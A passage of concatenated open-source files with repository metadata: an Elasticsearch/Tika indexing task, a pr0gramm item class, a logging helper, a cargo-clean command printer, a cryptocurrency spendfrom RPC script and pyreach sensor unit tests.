        # but were still appended, leaving doubled spaces in the output and
        # contradicting the "removing ... numbers" contract above.
        if token and token not in stopwords:
            cleaned.append(token)
            keyword_phrase = last_token + ' ' + token
            if keyword_phrase in features:
                features[keyword_phrase] = 1
        last_token = token
    return " ".join(cleaned), features
@shared_task(bind=True)
def create_index(self, index, *args, **kwargs):
    """Celery task: (re)build an Elasticsearch index from PDFs parsed by Tika.

    NOTE(review): Python 2 code (`print e` below); keep that in mind before
    porting.  `self` is the bound Celery task instance, and the task stores
    the index object on it for the duration of the run.
    """
    self.index = index
    # Check whether a CeleryTask already exists. If not, create the new
    # object. If yes (IntegrityError), update the rows of the already
    # existing object.
    try:
        self.index_task = CeleryTask(index=self.index, uuid=self.request.id)
        self.index_task.save()
    except IntegrityError:
        self.index_task = CeleryTask.objects.get(index=self.index)
        self.index_task.uuid = self.request.id
        self.index_task.save()
    es = Elasticsearch([ELASTICSEARCH_HOST])
    files = [os.path.join(self.index.data_folder, x) for x in os.listdir(self.index.data_folder)]
    # Drop any previous index with the same slug before re-ingesting.
    if es.indices.exists(self.index.slug):
        print("Deleting '%s' index" % self.index.slug)
        res = es.indices.delete(index=self.index.slug)
        print(" response: '%s'" % res)
    stopwords = []  # NOTE(review): never populated — all tokens pass the stopword filter; TODO confirm intent
    for f in files:
        # Using experimental tika library - just a little janky
        response = parse('all', f, TIKA_ENDPOINT)[1]
        try:
            if response[0] == '[':
                # Sometimes response comes in brackets
                parsed = json.loads(response[1:-1])
            else:
                # Sometimes not.
                parsed = json.loads(response)
            # Clean the extracted text and flag keyword phrases in one pass.
            content, features = process_content(parsed["X-TIKA:content"], stopwords)
            parsed["X-TIKA:cleaned"] = content
            for kw, val in features.items():
                parsed["has_" + re.sub(' ', '_', kw)] = val
            #parsed["authors"] = process_authors(parsed["X-TIKA:content"])
            es.index(index="%s" % self.index.index_name,
                     doc_type="autonomy",
                     body = parsed,
                     )
        except Exception as e:
            # Strange errors coming from new tika parser
            # Just move on to the next document
            print e
            pass
|
{
"content_hash": "f93213b94d5c9cd4731f65f38e5bc3a5",
"timestamp": "",
"source": "github",
"line_count": 104,
"max_line_length": 97,
"avg_line_length": 33.79807692307692,
"alnum_prop": 0.5963015647226173,
"repo_name": "kod3r/memex-explorer",
"id": "b7f0decc47905db10546813bb1aec93ff3959ab7",
"size": "3515",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "source/task_manager/tika_tasks.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1416"
},
{
"name": "CSS",
"bytes": "48598"
},
{
"name": "HTML",
"bytes": "66219"
},
{
"name": "JavaScript",
"bytes": "39221"
},
{
"name": "Nginx",
"bytes": "1869"
},
{
"name": "Python",
"bytes": "127397"
},
{
"name": "SaltStack",
"bytes": "9226"
},
{
"name": "Shell",
"bytes": "7568"
}
],
"symlink_target": ""
}
|
from Tag import Tag
import time
from datetime import datetime
__author__ = "Peter Wolf"
__mail__ = "pwolf2310@gmail.com"
__date__ = "2016-12-25"
DATE_FORMAT = "%Y-%m-%d %H:%M:%S"
class Item:
    """An item (post) retrieved from pr0gramm.com.

    Items are ordered, compared, and hashed by their numeric ``id``.
    """

    def __init__(self, id):
        """Create an empty item; fields are filled in later (see parseFromJSON)."""
        self.id = id
        self.tags = []        # list of Tag objects
        self.promoted = None  # promotion id (None if never promoted)
        self.user = None      # uploader name
        self.created = None   # creation time as a unix timestamp
        self.image = ""       # relative path of the media file
        self.width = -1
        self.height = -1
        self.thumb = ""       # relative path of the thumbnail image
        self.fullsize = None  # relative path of the full-size media, if any
        self.source = None
        self.audio = False
        self.up = -1          # up votes
        self.down = -1        # down votes
        self.flags = 0        # content flag bitmask (semantics defined by the API)

    def __str__(self):
        return "Item {0}, Promoted: {1}, Created: {3}, User: {2}".format(
            self.id, self.promoted, self.user,
            time.strftime(DATE_FORMAT, time.localtime(self.created)))

    def __lt__(self, other):
        return self.id < other.id

    def __gt__(self, other):
        return self.id > other.id

    def __eq__(self, other):
        return self.id == other.id

    def __ne__(self, other):
        return not self.__eq__(other)

    def __hash__(self):
        # Defining __eq__ suppresses the inherited hash on Python 3; restore
        # hashability consistently with equality (equal ids hash equally).
        return hash(self.id)

    def asDict(self):
        """Return a JSON-serializable dict representation of this item.

        Operates on a copy of ``__dict__`` so the Tag objects stored in
        ``self.tags`` are not replaced by plain dicts as a side effect
        (the previous implementation mutated the item itself).
        """
        d = dict(self.__dict__)
        d["tags"] = [tag.__dict__ for tag in self.tags]
        return d

    def description(self):
        """Return a multi-line, human-readable summary of the item."""
        return "Item {0}, Promoted: {1}, Created: {3}, User: {2}\n".format(
            self.id, self.promoted, self.user,
            time.strftime(DATE_FORMAT, time.localtime(self.created))) \
            + "Image: {0} ({1}x{2})\n".format(
                self.image, self.width, self.height) \
            + "Thumb: {0}\n".format(self.thumb) \
            + "Full Size: {0}\n".format(self.fullsize) \
            + "Source: {0}\n".format(self.source) \
            + "Flags: {0}, {1} up, {2} down\n".format(
                self.flags, self.up, self.down) \
            + "Tags: {}".format(", ".join([str(tag) for tag in self.tags]))

    def isImage(self):
        """True if the media file is a still image (jpg/png)."""
        return self.image.endswith(".jpg") \
            or self.image.endswith(".png")

    def isVideo(self):
        """True if the media file is animated (mp4/gif)."""
        return self.image.endswith(".mp4") \
            or self.image.endswith(".gif")

    def getAge(self):
        """Return the item's age as a datetime.timedelta."""
        return datetime.now() - datetime.fromtimestamp(self.created)

    def getSortId(self):
        return self.promoted

    def getMediaLink(self):
        return self.image

    def getThumbnailLink(self):
        return self.thumb

    def getFullsizeLink(self):
        return self.fullsize

    def setTagsFromJSON(self, json_tags):
        """Replace self.tags with Tag objects built from a JSON tag list."""
        self.tags = []
        for json_tag in json_tags:
            self.tags.append(
                Tag(
                    json_tag["id"],
                    json_tag["confidence"],
                    json_tag["tag"]))

    @staticmethod
    def parseFromJSON(json_item):
        """Build an Item from a JSON dict as returned by the pr0gramm API."""
        parsed_item = Item(json_item["id"])
        parsed_item.promoted = json_item["promoted"]
        parsed_item.user = json_item["user"]
        parsed_item.created = json_item["created"]
        parsed_item.image = json_item["image"]
        parsed_item.width = json_item["width"]
        parsed_item.height = json_item["height"]
        parsed_item.thumb = json_item["thumb"]
        parsed_item.fullsize = json_item["fullsize"]
        parsed_item.source = json_item["source"]
        parsed_item.audio = json_item["audio"]
        parsed_item.up = json_item["up"]
        parsed_item.down = json_item["down"]
        parsed_item.flags = json_item["flags"]
        parsed_item.tags = []
        # "tags" is optional in API responses.
        if "tags" in json_item.keys():
            for json_tag in json_item["tags"]:
                tag = Tag(json_tag["id"],
                          json_tag["confidence"],
                          json_tag["tag"])
                parsed_item.tags.append(tag)
        return parsed_item

    @staticmethod
    def mockItem():
        """Return a fixed example item for testing."""
        mock = Item(1679829)
        mock.promoted = 204476
        mock.user = "ExampleUser"
        mock.created = 1482583310
        mock.image = "2016/12/24/058d591eb1eddbd3.mp4"
        mock.width = 640
        mock.height = 360
        mock.thumb = "2016/12/24/058d591eb1eddbd3.jpg"
        mock.fullsize = ""
        mock.source = ""
        mock.audio = False
        mock.up = 699
        mock.down = 11
        mock.flags = 1
        return mock
|
{
"content_hash": "1cedd2bfb56c2f098fef0b02092fb231",
"timestamp": "",
"source": "github",
"line_count": 145,
"max_line_length": 75,
"avg_line_length": 29.386206896551723,
"alnum_prop": 0.5301572400844872,
"repo_name": "BigPeet/pr0tagger",
"id": "5d0a68a0dba466d8c67216991059ebdf611b0859",
"size": "4261",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/pr0gramm/Item.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "23924"
}
],
"symlink_target": ""
}
|
import logging
# Level assigned to loggers handed out by get_logger: NOTSET makes them
# defer to the root logger's effective level.
_LOG_LEVEL_NOTSET = 'NOTSET'
def get_logger(logger_name):
    """Return a logger obtained through the module-wide LoggingManager."""
    manager = _LOGGING_MANAGER
    return manager.get_logger(logger_name)
def get_log_manager():
    """Return the module-wide LoggingManager instance."""
    return _LOGGING_MANAGER
def _cfg_var_exists(cfg, var_name):
var = None
if isinstance(cfg, dict):
var = cfg.get(var_name)
elif hasattr(cfg, var_name):
var = getattr(cfg, var_name)
return var is not None
class LoggingConfig(object):
    """Value object holding the default logging settings: console-only
    output at INFO level, no logfile."""

    def __init__(self):
        self.logfile, self.level, self.console_enabled = None, 'INFO', True
class LoggingManager(object):
    """Owns the root logger and the handlers this module installs on it.

    Bug fix: ``configure`` previously read settings with ``cfg['...']``
    subscripting even though the config may be an attribute-style object
    such as LoggingConfig (as _cfg_var_exists acknowledges); object configs
    raised TypeError.  Settings are now read via ``_cfg_get``, which
    supports both dicts and objects.
    """

    def __init__(self):
        self._root_logger = logging.getLogger()
        self._handlers = []

    @staticmethod
    def _cfg_get(cfg, var_name, default=None):
        """Read *var_name* from a dict or attribute-style config object."""
        if isinstance(cfg, dict):
            return cfg.get(var_name, default)
        return getattr(cfg, var_name, default)

    def _add_handler(self, handler):
        """Install *handler* on the root logger and remember it for cleanup."""
        self._handlers.append(handler)
        self._root_logger.addHandler(handler)

    def _clean_handlers(self):
        """Detach every handler previously installed by this manager."""
        for handler in self._handlers:
            self._root_logger.removeHandler(handler)
        del self._handlers[:]

    def configure(self, cfg):
        """(Re)configure root logging from *cfg* (dict or object).

        Recognized settings: ``logfile`` (path), ``console_enabled``
        (must be exactly True to add a stream handler, matching the
        original behavior) and ``level``.
        """
        self._clean_handlers()
        # Should we write to a logfile?
        logfile = self._cfg_get(cfg, 'logfile')
        if logfile is not None:
            self._add_handler(logging.FileHandler(logfile))
        # Is console output enabled?
        if self._cfg_get(cfg, 'console_enabled') is True:
            self._add_handler(logging.StreamHandler())
        # How verbose should we be?
        level = self._cfg_get(cfg, 'level')
        if level is not None:
            self._root_logger.setLevel(level)
            self._root_logger.info('Logging level set to: {level}'.format(
                level=level))

    def get_logger(self, logger_name):
        """Return a named logger that defers to the root logger's level."""
        logger = logging.getLogger(logger_name)
        logger.setLevel(_LOG_LEVEL_NOTSET)
        return logger
# Module-wide singleton manager.  A plain top-level assignment is the
# idiomatic equivalent of the original write through globals().
_LOGGING_MANAGER = LoggingManager()
|
{
"content_hash": "9227730df8f7f7d5e7f684b9f85dd01c",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 74,
"avg_line_length": 25.23611111111111,
"alnum_prop": 0.6042927903137039,
"repo_name": "zinic/chuckbox",
"id": "172b0fa3de70d16ecd9e882ed16b7446737c6167",
"size": "1817",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/chuckbox/log.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "15478"
}
],
"symlink_target": ""
}
|
"""
Usage: ./clean_cargo_all <root_dir>
Find all project directories containg a `Cargo.toml` and run
`cargo clean` in them.
"""
import os
import sys
def find_dirs_with_file(root_dir, file_name):
    """Walk *root_dir* and return a sorted list of every directory that
    directly contains a file named *file_name*."""
    matches = [path for path, _subdirs, files in os.walk(root_dir)
               if file_name in files]
    return sorted(matches)
def make_clean_cargo_cmd(root_dir):
    """Build one shell command that runs `cargo clean` in every Cargo
    project under *root_dir*, returning to the current directory at the end."""
    project_dirs = find_dirs_with_file(root_dir, "Cargo.toml")
    steps = ["cd %s && cargo clean" % project_dir for project_dir in project_dirs]
    steps.append("cd %s" % os.getcwd())
    return " && \\\n".join(steps)
if __name__ == "__main__":
    # Root directory is the single CLI argument (see module docstring).
    root_dir = sys.argv[1]
    # The command is printed rather than executed so the user can review it.
    print("Run the following command:\n")
    print(make_clean_cargo_cmd(root_dir))
|
{
"content_hash": "e06fbdebddd409e427d315134fbd72b1",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 64,
"avg_line_length": 26.62962962962963,
"alnum_prop": 0.6203059805285118,
"repo_name": "thorbenk/dotfiles",
"id": "e913a54dda03ea591c93c04a5564442be055f275",
"size": "743",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bin/clean_cargo_all.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Lua",
"bytes": "40401"
},
{
"name": "Python",
"bytes": "3479"
},
{
"name": "Shell",
"bytes": "9831"
},
{
"name": "TeX",
"bytes": "3371"
},
{
"name": "Vim script",
"bytes": "94156"
}
],
"symlink_target": ""
}
|
from decimal import *
import getpass
import math
import os
import os.path
import platform
import sys
import time
from jsonrpc import ServiceProxy, json
# Fee threshold (in coin units) used when deciding whether change is worth
# returning (create_tx) and when sanity-checking transaction fees.
BASE_FEE=Decimal("0.001")
def check_json_precision():
    """Make sure json library being used does not lose precision converting BTC values"""
    value = Decimal("20000000.00000003")
    round_tripped = json.loads(json.dumps(float(value)))
    if int(round_tripped * 1.0e8) != 2000000000000003:
        raise RuntimeError("JSON encode/decode loses precision")
def determine_db_dir():
    """Return the default location of the aspire data directory"""
    system = platform.system()
    if system == "Darwin":
        return os.path.expanduser("~/Library/Application Support/Aspire/")
    if system == "Windows":
        return os.path.join(os.environ['APPDATA'], "Aspire")
    return os.path.expanduser("~/.aspire")
def read_bitcoin_config(dbdir):
    """Read the aspire.conf file from dbdir, returns dictionary of settings"""
    # NOTE: Python 2 module name; this whole script targets Python 2.
    from ConfigParser import SafeConfigParser
    class FakeSecHead(object):
        # ConfigParser requires at least one [section] header, which
        # aspire.conf lacks; this wrapper injects a fake "[all]" header.
        def __init__(self, fp):
            self.fp = fp
            self.sechead = '[all]\n'
        def readline(self):
            if self.sechead:
                # Return the fake header exactly once: the finally clause
                # clears it after the return value is computed.
                try: return self.sechead
                finally: self.sechead = None
            else:
                s = self.fp.readline()
                # Strip inline '#' comments, which ConfigParser can't parse.
                if s.find('#') != -1:
                    s = s[0:s.find('#')].strip() +"\n"
                return s
    config_parser = SafeConfigParser()
    config_parser.readfp(FakeSecHead(open(os.path.join(dbdir, "aspire.conf"))))
    return dict(config_parser.items("all"))
def connect_JSON(config):
    """Connect to a aspire JSON-RPC server.

    Exits with status 1 (after writing to stderr) when the connection
    fails or the server's testnet setting does not match the config.

    Bug fix: the original bare ``except:`` also caught the SystemExit
    raised by the testnet-mismatch branch, printing a second, misleading
    "Error connecting" message.  SystemExit is now re-raised and only
    genuine connection errors are reported.
    """
    testnet = config.get('testnet', '0')
    testnet = (int(testnet) > 0)  # 0/1 in config file, convert to True/False
    if 'rpcport' not in config:
        config['rpcport'] = 16179 if testnet else 6179
    connect = "http://%s:%s@127.0.0.1:%s"%(config['rpcuser'], config['rpcpassword'], config['rpcport'])
    try:
        result = ServiceProxy(connect)
        # ServiceProxy is lazy-connect, so send an RPC command mostly to catch connection errors,
        # but also make sure the aspired we're talking to is/isn't testnet:
        if result.getmininginfo()['testnet'] != testnet:
            sys.stderr.write("RPC server at "+connect+" testnet setting mismatch\n")
            sys.exit(1)
        return result
    except SystemExit:
        raise  # our own exit above -- don't mask it with a connection error
    except Exception:
        sys.stderr.write("Error connecting to RPC server at "+connect+"\n")
        sys.exit(1)
def unlock_wallet(aspired):
    """Ensure the wallet is unlocked, prompting for a passphrase if needed.

    Returns True when the wallet is unencrypted or currently unlocked.
    """
    info = aspired.getinfo()
    if 'unlocked_until' not in info:
        return True # wallet is not encrypted
    unlocked_until = int(info['unlocked_until'])
    if unlocked_until <= time.time():
        # Locked (or the unlock window expired): ask once and retry.
        try:
            passphrase = getpass.getpass("Wallet is locked; enter passphrase: ")
            aspired.walletpassphrase(passphrase, 5)
        except:
            sys.stderr.write("Wrong passphrase\n")
        info = aspired.getinfo()
    return int(info['unlocked_until']) > time.time()
def list_available(aspired):
    """Collect spendable outputs grouped by address.

    Returns ``{address: {"total": Decimal, "outputs": [unspent, ...],
    "account": str}}``.  Only ordinary pay-to-address and
    pay-to-script-hash outputs are considered; anything exotic is ignored.
    """
    address_to_account = dict()
    for entry in aspired.listreceivedbyaddress(0):
        address_to_account[entry["address"]] = entry["account"]

    address_summary = dict()
    for output in aspired.listunspent(0):
        # listunspent doesn't give addresses, so look up the transaction:
        rawtx = aspired.getrawtransaction(output['txid'], 1)
        vout_entry = rawtx["vout"][output['vout']]
        script_pubkey = vout_entry["scriptPubKey"]
        if script_pubkey["type"] not in ("pubkeyhash", "scripthash"):
            continue
        address = script_pubkey["addresses"][0]
        summary = address_summary.get(address)
        if summary is None:
            address_summary[address] = {
                "total" : vout_entry["value"],
                "outputs" : [output],
                "account" : address_to_account.get(address, "")
                }
        else:
            summary["total"] += vout_entry["value"]
            summary["outputs"].append(output)
    return address_summary
def select_coins(needed, inputs):
    """Greedy coin selection: take inputs in order until *needed* is covered.

    Returns ``(selected, change)`` where *selected* is a list of
    ``{"txid", "vout"}`` dicts and *change* is the surplus (negative when
    the inputs cannot cover the amount).
    """
    selected = []
    gathered = Decimal("0.0")
    for candidate in inputs:
        if gathered >= needed:
            break
        selected.append({ "txid":candidate["txid"], "vout":candidate["vout"]})
        gathered += candidate["amount"]
    return (selected, gathered-needed)
def create_tx(aspired, fromaddresses, toaddress, amount, fee):
    """Create and sign a raw transaction spending from *fromaddresses*.

    Sends *amount* to *toaddress*; change above BASE_FEE goes back to the
    last address in *fromaddresses*.  Returns the signed transaction as a
    hex string, or exits with status 1 on failure.
    """
    available = list_available(aspired)
    needed = amount+fee
    candidate_inputs = []
    total_available = Decimal("0.0")
    for address in fromaddresses:
        if address not in available:
            continue
        candidate_inputs.extend(available[address]["outputs"])
        total_available += available[address]["total"]
    if total_available < needed:
        sys.stderr.write("Error, only %f BTC available, need %f\n"%(total_available, needed))
        sys.exit(1)
    #
    # Note:
    # Python's json/jsonrpc modules have inconsistent support for Decimal numbers.
    # Instead of wrestling with getting json.dumps() (used by jsonrpc) to encode
    # Decimals, amounts are cast to float before being sent to aspired.
    #
    outputs = { toaddress : float(amount) }
    (inputs, change_amount) = select_coins(needed, candidate_inputs)
    if change_amount > BASE_FEE: # don't bother with zero or tiny change
        change_address = fromaddresses[-1]
        outputs[change_address] = outputs.get(change_address, 0.0) + float(change_amount)
    rawtx = aspired.createrawtransaction(inputs, outputs)
    signed_rawtx = aspired.signrawtransaction(rawtx)
    if not signed_rawtx["complete"]:
        sys.stderr.write("signrawtransaction failed\n")
        sys.exit(1)
    return signed_rawtx["hex"]
def compute_amount_in(aspired, txinfo):
    """Sum the values of all inputs of *txinfo* by looking up each
    funding transaction via the RPC connection."""
    total = Decimal("0.0")
    for vin in txinfo['vin']:
        funding_tx = aspired.getrawtransaction(vin['txid'], 1)
        total += funding_tx['vout'][vin['vout']]['value']
    return total
def compute_amount_out(txinfo):
    """Sum the values of all outputs of the decoded transaction *txinfo*."""
    return sum((vout['value'] for vout in txinfo['vout']), Decimal("0.0"))
def sanity_test_fee(aspired, txdata_hex, max_fee):
    """Abort (exit 1, message on stderr) if the transaction's implied fee
    looks unreasonable.

    Bug fix: the original code compared an undefined name ``fee`` in the
    no-fee checks (a NameError whenever those branches ran); the implied
    fee is now computed once as ``total_in - total_out`` and reused.
    """
    class FeeError(RuntimeError):
        pass
    try:
        txinfo = aspired.decoderawtransaction(txdata_hex)
        total_in = compute_amount_in(aspired, txinfo)
        total_out = compute_amount_out(txinfo)
        fee = total_in - total_out  # implied miner fee
        if fee > max_fee:
            raise FeeError("Rejecting transaction, unreasonable fee of "+str(fee))

        tx_size = len(txdata_hex)/2
        kb = tx_size/1000  # integer division rounds down
        if kb > 1 and fee < BASE_FEE:
            raise FeeError("Rejecting no-fee transaction, larger than 1000 bytes")
        if total_in < 0.01 and fee < BASE_FEE:
            raise FeeError("Rejecting no-fee, tiny-amount transaction")
        # Exercise for the reader: compute transaction priority, and
        # warn if this is a very-low-priority transaction
    except FeeError as err:
        sys.stderr.write((str(err)+"\n"))
        sys.exit(1)
def main():
    """CLI entry point: list spendable balances, or build/send a transaction.

    With no --amount, prints per-address balances; otherwise spends from
    the --from addresses to --to.  NOTE: Python 2 only (uses iteritems).
    """
    import optparse
    parser = optparse.OptionParser(usage="%prog [options]")
    parser.add_option("--from", dest="fromaddresses", default=None,
                      help="addresses to get aspires from")
    parser.add_option("--to", dest="to", default=None,
                      help="address to get send aspires to")
    parser.add_option("--amount", dest="amount", default=None,
                      help="amount to send")
    parser.add_option("--fee", dest="fee", default="0.0",
                      help="fee to include")
    parser.add_option("--datadir", dest="datadir", default=determine_db_dir(),
                      help="location of aspire.conf file with RPC username/password (default: %default)")
    parser.add_option("--testnet", dest="testnet", default=False, action="store_true",
                      help="Use the test network")
    parser.add_option("--dry_run", dest="dry_run", default=False, action="store_true",
                      help="Don't broadcast the transaction, just create and print the transaction data")
    (options, args) = parser.parse_args()
    check_json_precision()
    config = read_bitcoin_config(options.datadir)
    if options.testnet: config['testnet'] = True
    aspired = connect_JSON(config)
    # No amount given: just report spendable balances per address.
    if options.amount is None:
        address_summary = list_available(aspired)
        for address,info in address_summary.iteritems():
            n_transactions = len(info['outputs'])
            if n_transactions > 1:
                print("%s %.8f %s (%d transactions)"%(address, info['total'], info['account'], n_transactions))
            else:
                print("%s %.8f %s"%(address, info['total'], info['account']))
    else:
        fee = Decimal(options.fee)
        amount = Decimal(options.amount)
        while unlock_wallet(aspired) == False:
            pass # Keep asking for passphrase until they get it right
        txdata = create_tx(aspired, options.fromaddresses.split(","), options.to, amount, fee)
        # Refuse to send if the implied fee exceeds 1% of the amount.
        sanity_test_fee(aspired, txdata, amount*Decimal("0.01"))
        if options.dry_run:
            print(txdata)
        else:
            txid = aspired.sendrawtransaction(txdata)
            print(txid)

if __name__ == '__main__':
    main()
|
{
"content_hash": "7a095cec433a37c18a185bea425d6d65",
"timestamp": "",
"source": "github",
"line_count": 252,
"max_line_length": 111,
"avg_line_length": 38.21031746031746,
"alnum_prop": 0.6147055769031052,
"repo_name": "aspirecoin/aspire",
"id": "51c272ee5ab2bcc2e14bd6bc55319d3c56b9f0e7",
"size": "10004",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "contrib/spendfrom/spendfrom.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "7639"
},
{
"name": "C",
"bytes": "1098258"
},
{
"name": "C++",
"bytes": "5513873"
},
{
"name": "CSS",
"bytes": "122225"
},
{
"name": "HTML",
"bytes": "50621"
},
{
"name": "Java",
"bytes": "2100"
},
{
"name": "M4",
"bytes": "147917"
},
{
"name": "Makefile",
"bytes": "91439"
},
{
"name": "Objective-C",
"bytes": "7279"
},
{
"name": "Objective-C++",
"bytes": "7237"
},
{
"name": "Protocol Buffer",
"bytes": "2308"
},
{
"name": "Python",
"bytes": "713599"
},
{
"name": "QMake",
"bytes": "27053"
},
{
"name": "Roff",
"bytes": "21655"
},
{
"name": "Shell",
"bytes": "55643"
}
],
"symlink_target": ""
}
|
from typing import List, Optional
import unittest
from pyreach import core
from pyreach.common.python import types_gen
from pyreach.force_torque_sensor import ForceTorqueSensorState
from pyreach.impl import force_torque_sensor_impl
from pyreach.impl import test_utils
from pyreach.impl import thread_util
class ForceTorqueSensorImplTest(unittest.TestCase):
  """Tests for the force-torque sensor device implementation."""

  def test_test_force_torque_sensor(self) -> None:
    """Exercise the fake responder directly through the test harness."""
    test_utils.run_test_client_test([TestForceTorqueSensor("test-name")], [
        test_utils.TestResponderStep(
            types_gen.CommandData(
                ts=1,
                device_type="force-torque-sensor",
                device_name="test-name",
                data_type="frame-request"), (types_gen.DeviceData(
                    ts=1,
                    device_type="force-torque-sensor",
                    device_name="test-name",
                    data_type="sensor-state",
                    state=[
                        types_gen.CapabilityState(pin="fx", float_value=1.0),
                        types_gen.CapabilityState(pin="fy", float_value=2.0),
                        types_gen.CapabilityState(pin="fz", float_value=3.0),
                        types_gen.CapabilityState(pin="tx", float_value=4.0),
                        types_gen.CapabilityState(pin="ty", float_value=5.0),
                        types_gen.CapabilityState(pin="tz", float_value=6.0),
                    ]),)),
        # A tagged frame-request additionally yields a "done" cmd-status.
        test_utils.TestResponderStep(
            types_gen.CommandData(
                ts=1,
                device_type="force-torque-sensor",
                device_name="test-name",
                data_type="frame-request",
                tag="test-tag"), (types_gen.DeviceData(
                    ts=1,
                    tag="test-tag",
                    device_type="force-torque-sensor",
                    device_name="test-name",
                    data_type="sensor-state",
                    state=[
                        types_gen.CapabilityState(pin="fx", float_value=1.0),
                        types_gen.CapabilityState(pin="fy", float_value=2.0),
                        types_gen.CapabilityState(pin="fz", float_value=3.0),
                        types_gen.CapabilityState(pin="tx", float_value=4.0),
                        types_gen.CapabilityState(pin="ty", float_value=5.0),
                        types_gen.CapabilityState(pin="tz", float_value=6.0),
                    ]),
                types_gen.DeviceData(
                    ts=1,
                    device_type="force-torque-sensor",
                    device_name="test-name",
                    data_type="cmd-status",
                    tag="test-tag",
                    status="done"))),
        # Requests for other device names/types must get no response.
        test_utils.TestResponderStep(
            types_gen.CommandData(
                ts=1,
                device_type="force-torque-sensor",
                device_name="test",
                data_type="frame-request"), ()),
        test_utils.TestResponderStep(
            types_gen.CommandData(
                ts=1,
                device_type="force-torque-sensor",
                device_name="",
                data_type="frame-request"), ()),
        test_utils.TestResponderStep(
            types_gen.CommandData(
                ts=1,
                device_type="test",
                device_name="test-name",
                data_type="frame-request"), ()),
    ])

  def test_force_torque_sensor(self) -> None:
    """Fetch states synchronously and asynchronously, including timeouts."""
    ## Setup, ensure no cached frame, and that tagged requests will be used.
    rdev, dev = force_torque_sensor_impl.ForceTorqueSensorDevice(
        "test-name").get_wrapper()
    with test_utils.TestDevice(rdev) as test_device:
      global_callbacks: "thread_util.CallbackCapturer[ForceTorqueSensorState]" = thread_util.CallbackCapturer(
      )
      stop_callback = dev.add_update_callback(
          global_callbacks.callback_false, global_callbacks.finished_callback)
      assert dev.state is None
      test_device.set_responder(TestForceTorqueSensor("test-name"))
      ## Get the first state
      frame = dev.fetch_state()
      test_device.expect_command_data([
          types_gen.CommandData(
              data_type="frame-request",
              device_type="force-torque-sensor",
              device_name="test-name")
      ])
      self._verify_state(frame, "test-name")
      self._verify_state(dev.state, "test-name")
      ## ensure cached is the first frame
      assert dev.state == frame
      ## Use callbacks to get the next frames
      callback: ("thread_util.DoubleCallbackCapturer[ForceTorqueSensorState, "
                 "core.PyReachStatus]") = thread_util.DoubleCallbackCapturer()
      dev.async_fetch_state(
          callback=callback.first_callback_finish,
          error_callback=callback.second_callback_finish)
      frames = callback.wait()
      test_device.expect_command_data([
          types_gen.CommandData(
              data_type="frame-request",
              device_type="force-torque-sensor",
              device_name="test-name")
      ])
      assert len(frames) == 1
      self._verify_state(frames[0][0], "test-name")
      ## frame is cached
      cached_frame = frames[0][0]
      assert dev.state == cached_frame
      ## set the callback to None to test timeouts
      test_device.set_callback(None)
      self.assertRaises(core.PyReachError, dev.fetch_state, timeout=0)
      test_device.expect_command_data([
          types_gen.CommandData(
              data_type="frame-request",
              device_type="force-torque-sensor",
              device_name="test-name")
      ])
      callback = thread_util.DoubleCallbackCapturer()
      dev.async_fetch_state(
          callback=callback.first_callback_finish,
          error_callback=callback.second_callback_finish,
          timeout=0)
      empty_frames = callback.wait()
      assert len(empty_frames) == 1
      assert empty_frames[0][0] is None
      self._is_timeout(empty_frames[0][1])
      test_device.expect_command_data([
          types_gen.CommandData(
              data_type="frame-request",
              device_type="force-torque-sensor",
              device_name="test-name")
      ])
      assert dev.state == cached_frame
      stop_callback()
      global_frames = global_callbacks.wait()
      assert len(global_frames) == 2
      assert global_frames[0] == frame
      assert global_frames[1] == frames[0][0]

  def _verify_state(self, state: Optional[ForceTorqueSensorState],
                    name: str) -> None:
    """Assert that *state* carries the fake sensor's fixed readings."""
    self.assertIsNotNone(state)
    if not state:
      return
    self.assertEqual(state.device_name, name)
    self.assertEqual(state.force.x, 1.0)
    self.assertEqual(state.force.y, 2.0)
    self.assertEqual(state.force.z, 3.0)
    self.assertEqual(state.torque.x, 4.0)
    self.assertEqual(state.torque.y, 5.0)
    self.assertEqual(state.torque.z, 6.0)

  def _is_timeout(self, status: Optional[core.PyReachStatus]) -> None:
    """Assert that *status* is a completed request that timed out."""
    assert status is not None
    assert status.status == "done"
    assert status.error == "timeout"
class TestForceTorqueSensor(test_utils.TestResponder):
  """Represents a fake force torque sensor used for testing."""

  _device_name: str

  def __init__(self, device_name: str) -> None:
    """Initialize the fake sensor for the given device name."""
    self._device_name = device_name

  def _response(self, ts: int, tag: str) -> List[types_gen.DeviceData]:
    """Generate a test response with fixed force/torque readings."""
    readings = (("fx", 1.0), ("fy", 2.0), ("fz", 3.0),
                ("tx", 4.0), ("ty", 5.0), ("tz", 6.0))
    capability_states = [
        types_gen.CapabilityState(pin=pin, float_value=value)
        for pin, value in readings
    ]
    data = [
        types_gen.DeviceData(
            device_type="force-torque-sensor",
            device_name=self._device_name,
            ts=ts,
            tag=tag,
            data_type="sensor-state",
            state=capability_states)
    ]
    if tag:
      # Tagged requests additionally receive a terminal command status.
      data.append(
          types_gen.DeviceData(
              device_type="force-torque-sensor",
              device_name=self._device_name,
              ts=ts,
              tag=tag,
              data_type="cmd-status",
              status="done"))
    return data

  def step(self, cmd: types_gen.CommandData) -> List[types_gen.DeviceData]:
    """Test step, generates a response for testing framework data."""
    if not test_utils.is_frame_request_for(cmd, "force-torque-sensor",
                                           self._device_name):
      return []
    return self._response(cmd.ts, cmd.tag)

  def start(self) -> List[types_gen.DeviceData]:
    """No data is emitted on startup."""
    return []
if __name__ == "__main__":
  unittest.main()  # run all tests in this module
|
{
"content_hash": "1dcf5504ddda0cfd2786f2a85cfb02da",
"timestamp": "",
"source": "github",
"line_count": 222,
"max_line_length": 110,
"avg_line_length": 40.3963963963964,
"alnum_prop": 0.5594335414808207,
"repo_name": "google-research/pyreach",
"id": "c15608ae50dd688d02f8adf3e5711cf8a37a8d2f",
